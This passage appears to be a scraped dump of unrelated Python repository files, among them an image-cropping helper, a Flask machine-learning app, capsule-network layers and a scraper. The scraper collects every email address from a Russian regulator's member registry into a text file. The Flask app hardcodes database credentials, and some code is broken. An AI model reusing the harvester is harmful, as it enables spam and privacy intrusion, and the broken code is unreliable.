os\nfrom PIL import Image\nimport random\n\ndef process_images(augmentationHolder):\n    images_from_location = os.listdir(augmentationHolder.images_path)\n    for image_in_directory in images_from_location:\n        image_path = os.path.join(augmentationHolder.images_path, image_in_directory)\n        image = Image.open(image_path)\n        if augmentationHolder.new_size:\n            image = image.resize((augmentationHolder.new_size, augmentationHolder.new_size))\n        image_name = image_path.split('\\\\')[-1].split('.')[0]\n        \n        image = image.crop((augmentationHolder.top_x, \n                            augmentationHolder.top_y, \n                            augmentationHolder.top_x + augmentationHolder.patch_size, \n                            augmentationHolder.top_y + augmentationHolder.patch_size))\n        image.save(f\"{augmentationHolder.save_path}//{image_name}.tif\")\n# def process_images(images_path, save_path, new_size, patch_size, top_x, top_y):\n#     images_from_location = os.listdir(images_path)\n#     for image_in_directory in images_from_location:\n#         image_path = os.path.join(images_path, image_in_directory)\n#         image = Image.open(image_path)\n#         if new_size:\n#             image = image.resize((new_size, new_size))\n#         image_name = image_path.split('\\\\')[-1].split('.')[0]\n        \n#         image = image.crop((top_x, top_y, top_x + patch_size, top_y + patch_size))\n#         image.save(f\"{save_path}//{image_name}.tif\")\n\n# def process_images(images_path, save_path, patch_size):\n#     images_from_location = os.listdir(images_path)\n#     generated_values = False\n#     for image_in_directory in images_from_location:\n#         image_path = os.path.join(images_path, image_in_directory)\n#         image = Image.open(image_path)\n#         image_name = image_path.split('\\\\')[-1].split('.')[0]\n#         if not generated_values:\n#             width, height = image.size\n#             top_x = random.randint(0, width - patch_size[0])\n#             top_y = random.randint(0, height - patch_size[1])\n#             bottom_x = top_x + patch_size[0]\n#             bottom_y = top_y + patch_size[1]\n#             generated_values = True\n#         image = image.crop((top_x, top_y, bottom_x, bottom_y))\n
image.save(f\"{save_path}//{image_name}.tif\")\n \ndef process_location(augmentationObject, location):\n images_location = os.path.join(augmentationObject.image_path, location, 'images')\n images_from_location = os.listdir(images_location)\n \n location_save_name = f\"{augmentationObject.save_path}\\\\{location}_{augmentationObject.new_size}_{augmentationObject.patch_size}_{augmentationObject.top_x}_{augmentationObject.top_y}\\\\images\"\n while os.path.exists(location_save_name):\n top_x = random.randint(0, augmentationObject.new_size - augmentationObject.patch_size)\n top_y = random.randint(0, augmentationObject.new_size - augmentationObject.patch_size)\n location_save_name = f\"{augmentationObject.save_path}\\\\{location}_{augmentationObject.new_size}_{augmentationObject.patch_size}_{augmentationObject.top_x}_{augmentationObject.top_y}\\\\images\"\n os.mkdir(f\"{augmentationObject.save_path}\\\\{location}_{augmentationObject.new_size}_{augmentationObject.patch_size}_{augmentationObject.top_x}_{augmentationObject.top_y}\")\n os.mkdir(location_save_name)\n \n process_images(augmentation) \n return 1\n\n# def process_location(image_directory, save_directory, patch_size, location, unique_id):\n# images_location = os.path.join(image_directory, location, 'images')\n# images_from_location = os.listdir(images_location)\n# location_save_name = f\"{save_directory}\\\\{location}_{unique_id}\\\\images\"\n \n# create_directory(f\"{save_directory}\\\\{location}_{unique_id}\")\n# create_directory(location_save_name)\n \n# process_images(images_location, location_save_name, (patch_size[0], patch_size[1])) \n# return unique_id\n","repo_name":"Tensor-Reloaded/Property-Development-Prediction","sub_path":"ASET_Stuff/defs_refactored.py","file_name":"defs_refactored.py","file_ext":"py","file_size_in_byte":3952,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"70305348414","text":"from flask import Flask, jsonify, render_template, send_file\nimport csv\nimport mysql.connector\nimport random\nimport pandas as pd\nfrom sklearn.neighbors import KNeighborsRegressor\nfrom sklearn.neural_network import MLPClassifier\nfrom sklearn.naive_bayes import GaussianNB\nfrom sklearn.tree import DecisionTreeRegressor\nfrom sklearn.svm import SVR\nfrom sklearn.metrics import accuracy_score, confusion_matrix\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport io\n\napp = Flask(__name__)\n\n@app.route('/consulta', methods=['GET'])\ndef consultar_dados():\n try:\n # Conecta ao banco de dados MySQL\n conn = mysql.connector.connect(\n host='172.18.1.9',\n port=3306,\n user='user',\n password='senha',\n database='bd'\n )\n cursor = conn.cursor()\n\n # Executa a consulta dos últimos 20 dados da tabela\n cursor.execute('SELECT voltA AS voltA, voltB, voltC, correnteA, correnteB, correnteC, (voltA * correnteA) AS potenciaA, (voltB * correnteB) AS potenciaB, (voltC * correnteC) AS potenciaC from SM_002_Sensor LIMIT 20')\n data = cursor.fetchall()\n\n # Obtém os nomes das colunas\n field_names = [i[0] for i in cursor.description]\n\n # Gera um arquivo CSV com os dados\n with open('consulta.csv', 'w', newline='') as file:\n writer = csv.writer(file)\n writer.writerow(field_names)\n writer.writerows(data)\n\n # Lê o arquivo CSV gerado\n df = pd.read_csv('consulta.csv')\n\n # Remove 50% dos dados de forma aleatória\n df = df.sample(frac=0.5, random_state=42)\n\n # Separa os dados de entrada (X) e saída (y)\n X = df[['voltA', 'voltB', 'voltC', 'correnteA', 'correnteB', 
                'correnteC']]\n        y = df['potenciaA'].astype('int')\n\n        # Dictionary to store the results of the algorithms\n        results = {}\n\n        # KNN\n        knn = KNeighborsRegressor()\n        knn.fit(X, y)\n        knn_predictions = knn.predict(X)\n        knn_accuracy = accuracy_score(y, knn_predictions.round())\n        knn_confusion_matrix = confusion_matrix(y, knn_predictions.round())\n        results['knn'] = {'predictions': knn_predictions.tolist(), 'accuracy': knn_accuracy, 'confusion_matrix': knn_confusion_matrix.tolist()}\n\n        # MLP\n        mlp = MLPClassifier()\n        mlp.fit(X, y)\n        mlp_predictions = mlp.predict(X)\n        mlp_accuracy = accuracy_score(y, mlp_predictions.round())\n        mlp_confusion_matrix = confusion_matrix(y, mlp_predictions.round())\n        results['mlp'] = {'predictions': mlp_predictions.tolist(), 'accuracy': mlp_accuracy, 'confusion_matrix': mlp_confusion_matrix.tolist()}\n\n        # Naive Bayes\n        nb = GaussianNB()\n        nb.fit(X, y)\n        nb_predictions = nb.predict(X)\n        nb_accuracy = accuracy_score(y, nb_predictions.round())\n        nb_confusion_matrix = confusion_matrix(y, nb_predictions.round())\n        results['naive_bayes'] = {'predictions': nb_predictions.tolist(), 'accuracy': nb_accuracy, 'confusion_matrix': nb_confusion_matrix.tolist()}\n\n        # Decision Tree\n        dt = DecisionTreeRegressor()\n        dt.fit(X, y)\n        dt_predictions = dt.predict(X)\n        dt_accuracy = accuracy_score(y, dt_predictions.round())\n        dt_confusion_matrix = confusion_matrix(y, dt_predictions.round())\n        results['decision_tree'] = {'predictions': dt_predictions.tolist(), 'accuracy': dt_accuracy, 'confusion_matrix': dt_confusion_matrix.tolist()}\n\n        # SVM\n        svm = SVR()\n        svm.fit(X, y)\n        svm_predictions = svm.predict(X)\n        svm_accuracy = accuracy_score(y, svm_predictions.round())\n        svm_confusion_matrix = confusion_matrix(y, svm_predictions.round())\n        results['svm'] = {'predictions': svm_predictions.tolist(), 'accuracy': svm_accuracy, 'confusion_matrix': svm_confusion_matrix.tolist()}\n\n        cursor.close()\n        conn.close()\n\n        # Generate a new CSV file with the filtered data\n        filtered_data = df[['voltA', 'voltB', 'voltC', 'correnteA', 'correnteB', 'correnteC', 'potenciaA']]\n        filtered_data.to_csv('consulta_filtrada.csv', index=False)\n\n        # Save the confusion matrices as images\n        for algorithm, result in results.items():\n            cm = result['confusion_matrix']\n            labels = sorted(list(set(y)))\n            plt.figure(figsize=(8, 6))\n            sns.heatmap(cm, annot=True, fmt='d', cmap='Blues', xticklabels=labels, yticklabels=labels)\n            plt.title(f\"Confusion Matrix - {algorithm}\")\n            plt.xlabel(\"Predicted\")\n            plt.ylabel(\"True\")\n            plt.savefig(f\"static/{algorithm}_confusion_matrix.png\")\n            plt.close()\n\n        return render_template('results.html', results=results)\n\n    except Exception as e:\n        return jsonify({'error': str(e)}), 500\n\n@app.route('/images/<filename>')\ndef send_image(filename):\n    return send_file(f'static/{filename}', mimetype='image/png')\n\nif __name__ == '__main__':\n    app.run(host='0.0.0.0')\n","repo_name":"pauloeugenio/ml-api","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5050,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"25087286436","text":"# -*- coding: utf-8 -*-\nfrom bs4 import BeautifulSoup\nimport urllib.request\nimport urllib.parse\nfrom urllib.parse import urlparse\nfrom socket import timeout\nimport re\nimport sys\nimport os\nimport json, csv, sys\nimport unicodedata\nimport codecs\nfrom unicodedata import normalize\nimport xlsxwriter\nimport os.path\nfrom http.cookiejar import CookieJar\nimport collections\nimport 
math\n\ndef uprint(*objects, sep=' ', end='\\n', file=sys.stdout):\n enc = file.encoding\n if enc == 'UTF-8':\n print(*objects, sep=sep, end=end, file=file)\n else:\n f = lambda obj: str(obj).encode(enc, errors='backslashreplace').decode(enc)\n print(*map(f, objects), sep=sep, end=end, file=file)\n\n \nclass Aggregator(object):\n \n def __init__(self, config):\n main_url, output_file = [config.get(k) for k in sorted(config.keys())]\n self.main_url = main_url\n self.output_file = output_file\n\n def request_to_page(self, url, cnt_page):\n try:\n current_url = url\n cookie_jar = CookieJar()\n opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cookie_jar))\n urllib.request.install_opener(opener)\n\n params = urllib.parse.urlencode({\n '_search': 'false',\n 'nd': '1441114066092',\n 'rows': '20',\n 'page': cnt_page,\n 'sidx': '',\n 'sord': 'asc',\n })\n \n data = params.encode('utf-8')\n request = urllib.request.Request(url)\n request.add_header(\"Accept\",\"application/json, text/javascript, */*\")\n request.add_header(\"Accept-Language\",\"ru-RU,ru;q=0.8,en-US;q=0.6,en;q=0.4\")\n request.add_header(\"Connection\",\"keep-alive\")\n request.add_header(\"Accept-Encoding\",\"gzip, deflate\")\n request.add_header(\"Content-Length\",\"60\")\n request.add_header(\"Content-Type\",\"application/x-www-form-urlencoded\")\n request.add_header(\"Host\",\"sro.gosnadzor.ru\")\n request.add_header(\"Origin\",\"http://sro.gosnadzor.ru\")\n request.add_header(\"Referer\",\"http://sro.gosnadzor.ru/\")\n request.add_header(\"User-Agent\",\"Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36\")\n request.add_header(\"X-Compress\",\"null\")\n request.add_header(\"X-Requested-With\",\"XMLHttpRequest\")\n page = urllib.request.urlopen(request, data)\n\n content = page.read()\n #print(content)\n except urllib.error.URLError as e:\n if hasattr(e, 'reason'):\n print('Failed to connect to server.')\n print('Reason: ', e.reason)\n print(current_url)\n elif hasattr(e, 'code'):\n print('Error code: ', e.code)\n sys.exit(1)\n except timeout:\n print('socket timed out - URL %s', current_url)\n \n return content\n\n def request_to_p(self, url):\n try:\n current_url = url\n cookie_jar = CookieJar()\n opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cookie_jar))\n urllib.request.install_opener(opener)\n\n req = urllib.request.Request(url)\n page = urllib.request.urlopen(req)\n\n content = page.read()\n except urllib.error.URLError as e:\n if hasattr(e, 'reason'):\n print('Failed to connect to server.')\n print('Reason: ', e.reason)\n print(current_url)\n elif hasattr(e, 'code'):\n print('Error code: ', e.code)\n sys.exit(1)\n except timeout:\n print('socket timed out - URL %s', current_url)\n \n return content\n\n def start_process(self):\n \n pages_url = '/Home/SroData'\n for cnt in range(1,15):\n content = self.request_to_page(self.main_url+pages_url, str(cnt))\n try:\n req_arr = json.loads(content.decode('utf8'))\n rows = req_arr['rows']\n for row in rows:\n soup = BeautifulSoup(row['name'], \"lxml\")\n link = soup.find('a').attrs['href']\n print(self.main_url+link)\n cc = self.request_to_p(self.main_url+link)\n cc_soup = BeautifulSoup(cc, \"lxml\")\n mailto = cc_soup.select('a[href^=mailto]')[0].attrs['href'].replace('mailto:','')\n fo = open('sro_emails.txt', \"a\")\n fo.write(mailto+'\\n');\n fo.close()\n #print(mailto)\n \n #print(link)\n \n \"\"\"\n pager = soup.findAll('span', {\"class\": \"item fleft\"})\n last_page = 
pager[-1].find('span').text\n print(last_page)\n #int(last_page)\n for page in range(1,2):\n content_page = self.request_to_page(self.main_url+cat+'?page='+str(page))\n soup_page = BeautifulSoup(content_page, \"lxml\")\n page_links = soup_page.findAll('a', {\"class\": \"marginright5 link linkWithHash detailsLink\"})[0:-42]\n print(len(page_links))\n\n for item in page_links:\n item_url = item.attrs['href']\n content_item = self.request_to_page(item_url)\n soup_item = BeautifulSoup(content_item, \"lxml\")\n li_json = soup_item.find('li', {\"data-rel\": \"phone\"}).attrs['class']\n phone_id = li_json[5].replace(\"'id':'\",\"\").replace(\"',\",\"\")\n print(phone_id)\n parsed_uri = urlparse( item_url )\n domain = '{uri.scheme}://{uri.netloc}/'.format(uri=parsed_uri)\n phone_url = domain+'/ajax/misc/contact/phone/'+phone_id+'/'\n print(phone_url)\n phone_json = self.request_to_page(phone_url)\n phone_arr = json.loads(phone_json.decode('utf8'))\n phone_string = phone_arr['value']\n if(phone_string.find(\"span\")):\n soup_phone = BeautifulSoup(phone_string, \"lxml\")\n phone_string = soup_phone.find('span', {\"class\": \"block\"}).text\n \n print(phone_string)\n fo = open(cat.replace('/','')+'.txt', \"a\")\n fo.write(phone_string.replace(' ','-')+'\\n');\n fo.close()\n \"\"\"\n except:\n links = ''\n \nif __name__ == '__main__':\n settings = { 'main_url': 'http://sro.gosnadzor.ru', 'output_file': 'output.xlsx' }\n aggregator = Aggregator(settings)\n aggregator.start_process()\n","repo_name":"stdex/web_crawlers","sub_path":"sro_gosnadzor/sro.py","file_name":"sro.py","file_ext":"py","file_size_in_byte":7039,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"37021963640","text":"import matplotlib.pyplot as plt\nimport numpy as np\n\n\ndef demo():\n plt.figure()\n path=aspiral()\n plt.axis('equal')\n plt.show()\n\ndef aspiral():\n\n max_diameter= 40 # inches\n Nturns, segments_per_turn = 5, 64\n\n a = max_diameter / (2 * Nturns * 2*np.pi)\n t = np.arange(0, Nturns * 2*np.pi, 2*np.pi / segments_per_turn) # theta\n r = a * t # radius\n x, y = r * np.cos(t), r * np.sin(t) # cartesian\n k = 2 + t**2 / (a * (1 + t ** 2) ** 3/2) # curvature\n s = a/2 * (t * np.sqrt(1 + t ** 2) + np.arcsinh(t)) # arc length\n\n PLOT=True\n if PLOT:\n plt.subplot(211)\n plt.plot(x, y)\n plt.axis('equal')\n plt.title('spiral shape (inches)')\n\n plt.subplot(212)\n plt.plot(t, s/12)\n plt.xlabel('theta')\n plt.ylabel('arc length (feet)')\n\n return x+1j*y\n\n\nif __name__ == '__main__':\n demo()\n","repo_name":"alanbernstein/geometry","sub_path":"archimedean_spiral.py","file_name":"archimedean_spiral.py","file_ext":"py","file_size_in_byte":877,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"8784745743","text":"def interpolate(x1, x2, y1, y2, x):\n return y2 + (x - x2) * (y2 - y1) / (x2 - x1)\n\ndef map_positions(map, positions):\n \"\"\"\n Iterate through genetic positions and interpolate coordinates in cM.\n \"\"\"\n genetic_dist = []\n idx = 0\n n_row = len(map.index)\n for p in positions:\n while True:\n row = map.loc[idx]\n if p == row.Pos:\n genetic_dist.append(row.GeneticDist)\n break\n elif (p < row.Pos and idx != 0) or (idx + 1 == n_row):\n interp = interpolate(map.loc[idx-1, \"Pos\"], row.Pos, map.loc[idx-1, \"GeneticDist\"], row.GeneticDist, p)\n genetic_dist.append(interp)\n break\n elif p < row.Pos and idx == 0:\n interp = interpolate(row.Pos, map.loc[idx+1, \"Pos\"], row.GeneticDist, 
map.loc[idx+1, \"GeneticDist\"], p)\n genetic_dist.append(interp)\n break\n else:\n idx += 1\n return(genetic_dist)\n","repo_name":"roshnipatel/LocalAncestry","sub_path":"scripts/genetic_map.py","file_name":"genetic_map.py","file_ext":"py","file_size_in_byte":1000,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"12846460194","text":"\"\"\"\nThis is the default pillar exact matcher.\n\"\"\"\n\nimport logging\n\nimport salt.utils.data\n\nlog = logging.getLogger(__name__)\n\n\ndef match(tgt, delimiter=\":\", opts=None, minion_id=None):\n \"\"\"\n Reads in the pillar match, no globbing, no PCRE\n \"\"\"\n if not opts:\n opts = __opts__\n log.debug(\"pillar target: %s\", tgt)\n if delimiter not in tgt:\n log.error(\"Got insufficient arguments for pillar match statement from master\")\n return False\n\n if \"pillar\" in opts:\n pillar = opts[\"pillar\"]\n elif \"ext_pillar\" in opts:\n log.info(\"No pillar found, fallback to ext_pillar\")\n pillar = opts[\"ext_pillar\"]\n\n return salt.utils.data.subdict_match(\n pillar, tgt, delimiter=delimiter, exact_match=True\n )\n","repo_name":"saltstack/salt","sub_path":"salt/matchers/pillar_exact_match.py","file_name":"pillar_exact_match.py","file_ext":"py","file_size_in_byte":764,"program_lang":"python","lang":"en","doc_type":"code","stars":13606,"dataset":"github-code","pt":"78"} +{"seq_id":"73896442813","text":"#!/usr/bin/python3\n\"\"\" Task 6 module \"\"\"\n\"\"\" Error check function for positive integers \"\"\"\n\n\ndef int_check(value):\n if (type(value) != int):\n raise TypeError(\"size must be an integer\")\n return False\n if (value < 0):\n raise ValueError(\"size must be >= 0\")\n return False\n return True\n\n\n\"\"\" Error check function for tuple of 2 positive integers \"\"\"\n\n\ndef int_tuple_check(tup):\n if (type(tup) != tuple or len(tup) != 2):\n return False\n for i in range(0, 2):\n if (type(tup[i]) != int or tup[i] < 0):\n return False\n return True\n\n\n\"\"\" Square class representing a square \"\"\"\n\n\nclass Square():\n \"\"\" Square class \"\"\"\n def __init__(self, size=0, position=(0, 0)):\n if (int_check(size)):\n self.__size = size\n if (int_tuple_check(position)):\n self.__position = position\n else:\n raise TypeError(\"position must be a tuple of 2 positive integers\")\n\n @property\n def size(self):\n return self.__size\n\n @size.setter\n def size(self, size):\n if (int_check(size)):\n self.__size = size\n\n @property\n def position(self):\n return self.__position\n\n @position.setter\n def position(self, position):\n if (int_tuple_check(position)):\n self.__position = position\n else:\n raise TypeError(\"position must be a tuple of 2 positive integers\")\n\n def area(self):\n return self.__size ** 2\n\n def my_print(self):\n size = self.size\n if not size:\n print()\n return\n print(\"\\n\"*self.__position[1], end=\"\")\n for i in range(size):\n print(\" \"*self.__position[0], end=\"\")\n for i in range(size):\n print(\"#\", end=\"\")\n print()\n","repo_name":"blashernandez98/holbertonschool-higher_level_programming","sub_path":"python-classes/6-square.py","file_name":"6-square.py","file_ext":"py","file_size_in_byte":1810,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"13992731004","text":"from django.contrib.contenttypes.fields import GenericForeignKey\nfrom django.contrib.contenttypes.models import ContentType\nfrom django.db import models\n\n\n# Create your models here.\nclass 
Comment(models.Model):\n \"\"\"\n Define Comment Model, Level 1.\n \"\"\"\n from_id = models.ForeignKey('account.User', on_delete=models.CASCADE, related_name=\"from_user\")\n to_id = models.ForeignKey('account.User', on_delete=models.CASCADE, related_name=\"to_user\")\n pub_date = models.DateTimeField() # comment publish time\n content = models.TextField()\n content_type = models.ForeignKey(ContentType, on_delete=models.CASCADE) # the type of the object it belongs to.\n object_id = models.PositiveIntegerField() # answer id / article id / issue id\n content_object = GenericForeignKey('content_type', 'object_id')\n parent_comment = models.ForeignKey('self', on_delete=models.CASCADE, null=True) #record the parent comment. if it's level 1 comment. it should be null.\n likers = models.ManyToManyField('account.User', related_name='comment_liker')\n\n def __str__(self):\n return str(self.id)","repo_name":"FDUSoftware2020/backend","sub_path":"comment/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1110,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"32609198867","text":"\"\"\"\nEAE-126 Computational Aerodynamics (Spring 2011)\nDaniel Wiese\n\nProject 1: Steady, inviscid, adiabatic, incompressible, and irrotational 2D flows over cylinder\nPart 3: Flow field for Rankine body, Kelvin oval\n\nDerive the velocity for a Rankine and Kelvin body in uniform flow. Plot the velocity vectors and\nvelocity contours for each case. Calculate the pressure coefficient and plot it.\n\"\"\"\n\nimport numpy as np\nimport matplotlib\nimport matplotlib.pyplot as plt\nfrom matplotlib import cm\n\n# Set up coordinates\nxmin = -1\nxmax = 1\ndx = 0.05\nx = np.arange(xmin, xmax+dx, dx)\ny = np.arange(xmin, xmax+dx, dx)\nX, Y = np.meshgrid(x, y)\nngrid = len(x)\n\nrho = 1\nQ = 50\nGamma = 50\nvinf = 10\na = 0.23\n\nr = np.sqrt(X**2 + Y**2)\ncosine = X / r\nsine = Y / r\n\nuinf = np.full_like(X, vinf)\n\n####################################################################################################\n\nrsorc = np.sqrt((a + X)**2 + Y**2)\nrsink = np.sqrt((X - a)**2 + Y**2)\nrcw = np.sqrt((a + X)**2 + Y**2)\nrccw = np.sqrt((X - a)**2 + Y**2)\n\n####################################################################################################\n# This section generates velocity vectors and pressure contours for a doublet with uniform flow\n# around it: Rankine Body\n\nvsorc = Q / (2 * np.pi * rho * rsorc)\nvsink = -Q / (2 * np.pi * rho * rsink)\n\nvsorcx = vsorc * ((X + a) / rsorc)\nvsorcy = vsorc * (Y / rsorc)\nvsinkx = vsink * ((X - a) / rsink)\nvsinky = vsink * (Y / rsink)\n\nvrankx = vsorcx + vsinkx + uinf\nvranky = vsorcy + vsinky\n\nvrank = np.sqrt(vrankx**2 + vranky**2)\nprank = 1 - (vrank**2 / vinf**2)\n\nvrankx = np.clip(vrankx, -50, 50)\nvranky = np.clip(vranky, -50, 50)\nprank = np.clip(prank, -10, 10)\n\n####################################################################################################\n# This section generates velocity vectors and pressure contours for a\n# two vortices with uniform flow around it: Kelvin Oval\n\nvcw = Gamma / (2 * np.pi * rcw)\nvccw = Gamma / (2 * np.pi * rccw)\n\nvcwx = vcw * (Y / rcw)\nvcwy = -vcw * ((X + a) / rcw)\nvccwx = -vccw * (Y / rccw)\nvccwy = vccw * ((X - a) / rccw)\n\nvkelvx = vccwx + vcwx\nvkelvy = vccwy + vcwy + uinf\n\nvkelv = np.sqrt(vkelvx**2 + vkelvy**2)\npkelv = 1 - (vkelv**2 / vinf**2)\n\nvkelvx = np.clip(vkelvx, -50, 50)\nvkelvy = np.clip(vkelvy, -50, 50)\npkelv = 
np.clip(pkelv, -10, 10)\n\n####################################################################################################\n# Plot everything\n\ndef plot_all(X, Y, x, y, vel_x, vel_y, vel, cp, pattern):\n \"\"\" Plotter for quiver and contour plots\"\"\"\n TITLE_FONT_SIZE = 10\n TICK_FONT_SIZE = 8\n\n gridspec = {'width_ratios': [1, 1], 'height_ratios': [1, 1]}\n fig, axs = plt.subplots(2, 2, figsize=(8, 6), gridspec_kw=gridspec, dpi=200, facecolor='w', edgecolor='k')\n\n # Plot 2: Velocity contours\n c1 = axs[0, 1].contour(x, y, vel, 40, cmap=cm.jet, linewidths=0.5)\n axs[0, 1].set_aspect('equal', 'box')\n axs[0, 1].set_xlim(xmin, xmax)\n axs[0, 1].set_ylim(xmin, xmax)\n axs[0, 1].set_title(f'{pattern}: Velocity Contours', fontsize=TITLE_FONT_SIZE)\n axs[0, 1].tick_params(labelsize=TICK_FONT_SIZE)\n\n norm1 = matplotlib.colors.Normalize(vmin=c1.cvalues.min(), vmax=c1.cvalues.max())\n sm1 = plt.cm.ScalarMappable(norm=norm1, cmap = c1.cmap)\n sm1.set_array([])\n\n # Set the colorbar to the first subplot (for spacing only), remove it, and set the colorbar on\n # the intended subplot.\n cb1 = plt.colorbar(c1, ax=axs[0, 0], orientation='vertical', fraction=0.046, pad=0.04)\n cb1.remove()\n cb1 = plt.colorbar(sm1, ax=axs[0, 1], orientation='vertical', fraction=0.046, pad=0.04)\n cb1.ax.tick_params(labelsize=TICK_FONT_SIZE)\n\n # Plot 1: Velocity Vectors\n axs[0, 0].quiver(X, Y, vel_x, vel_y, scale=400)\n axs[0, 0].set_aspect('equal', 'box')\n axs[0, 0].set_xlim(xmin, xmax)\n axs[0, 0].set_ylim(xmin, xmax)\n axs[0, 0].set_title(f'{pattern}: Velocity Vectors', fontsize=TITLE_FONT_SIZE)\n axs[0, 0].tick_params(labelsize=TICK_FONT_SIZE)\n\n # Plot 3: Pressure contours\n c2 = axs[1, 0].contour(x, y, cp, 40, cmap=cm.jet, linewidths=0.5)\n axs[1, 0].set_aspect('equal', 'box')\n axs[1, 0].set_xlim(xmin, xmax)\n axs[1, 0].set_ylim(xmin, xmax)\n axs[1, 0].set_title(f'{pattern}: Pressure Contours', fontsize=TITLE_FONT_SIZE)\n axs[1, 0].tick_params(labelsize=TICK_FONT_SIZE)\n\n norm2 = matplotlib.colors.Normalize(vmin=c2.cvalues.min(), vmax=c2.cvalues.max())\n sm2 = plt.cm.ScalarMappable(norm=norm2, cmap = c2.cmap)\n sm2.set_array([])\n cb2 = plt.colorbar(sm2, ax=axs[1, 0], orientation='vertical', fraction=0.046, pad=0.04)\n cb2.ax.tick_params(labelsize=TICK_FONT_SIZE)\n\n # Plot 4: Pressure contours and velocity vectors\n c3 = axs[1, 1].contour(x, y, cp, 40, cmap=cm.jet, linewidths=0.5)\n axs[1, 1].quiver(X, Y, vel_x, vel_y, scale=400, zorder=10)\n axs[1, 1].set_aspect('equal', 'box')\n axs[1, 1].set_xlim(xmin, xmax)\n axs[1, 1].set_ylim(xmin, xmax)\n axs[1, 1].set_title(f'{pattern}: Pressure Contours and Velocity Vectors', fontsize=TITLE_FONT_SIZE)\n axs[1, 1].tick_params(labelsize=TICK_FONT_SIZE)\n\n norm3 = matplotlib.colors.Normalize(vmin=c2.cvalues.min(), vmax=c2.cvalues.max())\n sm3 = plt.cm.ScalarMappable(norm=norm3, cmap = c3.cmap)\n sm3.set_array([])\n cb3 = plt.colorbar(sm3, ax=axs[1, 1], orientation='vertical', fraction=0.046, pad=0.04)\n cb3.ax.tick_params(labelsize=TICK_FONT_SIZE)\n\n plt.tight_layout()\n\n fig.savefig(f'../fig/project1_part3_{pattern.lower().replace(\" \", \"_\")}.png', bbox_inches='tight')\n\n# Plot Rankine Body\nplot_all(X, Y, x, y, vrankx, vranky, vrank, prank, 'Rankine Body')\n\n# Plot Kelvin Oval\nplot_all(X, Y, x, y, vkelvx, vkelvy, vkelv, pkelv, 'Kelvin 
Oval')\n\nplt.show()\n","repo_name":"dpwiese/eae-126-python","sub_path":"project1/src/project1_part3.py","file_name":"project1_part3.py","file_ext":"py","file_size_in_byte":5729,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"13967227109","text":"\"\"\"\nTaken from: https://github.com/XifengGuo/CapsNet-Keras/blob/master/capsulelayers.py\nWe're only keeping the Length, PrimaryCap and CapsuleLayer parts\n\nSome key layers used for constructing a Capsule Network. These layers can used to construct CapsNet on other dataset, \nnot just on MNIST.\n\n*NOTE*: some functions can be implemented in multiple ways, I keep all of them. You can try them for yourself just by\nuncommenting them and commenting their counterparts.\nAuthor: Xifeng Guo, E-mail: `guoxifeng1990@163.com`, Github: `https://github.com/XifengGuo/CapsNet-Keras`\n\"\"\"\n\nimport keras.backend as K\nimport tensorflow as tf\nfrom keras import initializers, layers\n\nclass Length(layers.Layer):\n \"\"\"\n Compute the length of vectors. This is used to compute a Tensor that has the same shape with y_true in margin_loss.\n Using this layer as model's output can directly predict labels by using `y_pred = np.argmax(model.predict(x), 1)`\n inputs: shape=[None, num_vectors, dim_vector]\n output: shape=[None, num_vectors]\n \"\"\"\n def call(self, inputs, **kwargs):\n return K.sqrt(K.sum(K.square(inputs), -1))\n\n def compute_output_shape(self, input_shape):\n return input_shape[:-1]\n\n def get_config(self):\n config = super(Length, self).get_config()\n return config\n\ndef squash(vectors, axis=-1):\n \"\"\"\n The non-linear activation used in Capsule. It drives the length of a large vector to near 1 and small vector to 0\n :param vectors: some vectors to be squashed, N-dim tensor\n :param axis: the axis to squash\n :return: a Tensor with same shape as input vectors\n \"\"\"\n norm = tf.norm(vectors, axis=axis, keepdims=True)\n squared_norm = norm ** 2\n scale = squared_norm / (1 + squared_norm)\n return (vectors / norm) * scale\n\n# causes circular import so do it here\nfrom activations import get_capsule_activation\n\n\nclass CapsuleLayer(layers.Layer):\n \"\"\"\n The capsule layer. It is similar to Dense layer. Dense layer has `in_num` inputs, each is a scalar, the output of the \n neuron from the former layer, and it has `out_num` output neurons. CapsuleLayer just expand the output of the neuron\n from scalar to vector. So its input shape = [None, input_num_capsule, input_dim_capsule] and output shape = \\\n [None, num_capsule, dim_capsule]. 
For Dense Layer, input_dim_capsule = dim_capsule = 1.\n \n :param num_capsule: number of capsules in this layer\n :param dim_capsule: dimension of the output vectors of the capsules in this layer\n :param routings: number of iterations for the routing algorithm\n \"\"\"\n def __init__(self, num_capsule, dim_capsule, routings=3,\n kernel_initializer='glorot_uniform', squash_activation=squash,\n **kwargs):\n super(CapsuleLayer, self).__init__(**kwargs)\n self.num_capsule = num_capsule\n self.dim_capsule = dim_capsule\n self.routings = routings\n self.squash_activation = get_capsule_activation(squash_activation)\n self.kernel_initializer = initializers.get(kernel_initializer)\n\n def build(self, input_shape):\n assert len(input_shape) >= 3, \"The input Tensor should have shape=[None, input_num_capsule, input_dim_capsule]\"\n self.input_num_capsule = input_shape[1]\n self.input_dim_capsule = input_shape[2]\n\n # Transform matrix\n self.W = self.add_weight(shape=[self.num_capsule, self.input_num_capsule,\n self.dim_capsule, self.input_dim_capsule],\n initializer=self.kernel_initializer,\n name='W')\n\n self.built = True\n\n def call(self, inputs, training=None):\n # inputs.shape=[None, input_num_capsule, input_dim_capsule]\n # inputs_expand.shape=[None, 1, input_num_capsule, input_dim_capsule]\n inputs_expand = K.expand_dims(inputs, 1)\n\n # Replicate num_capsule dimension to 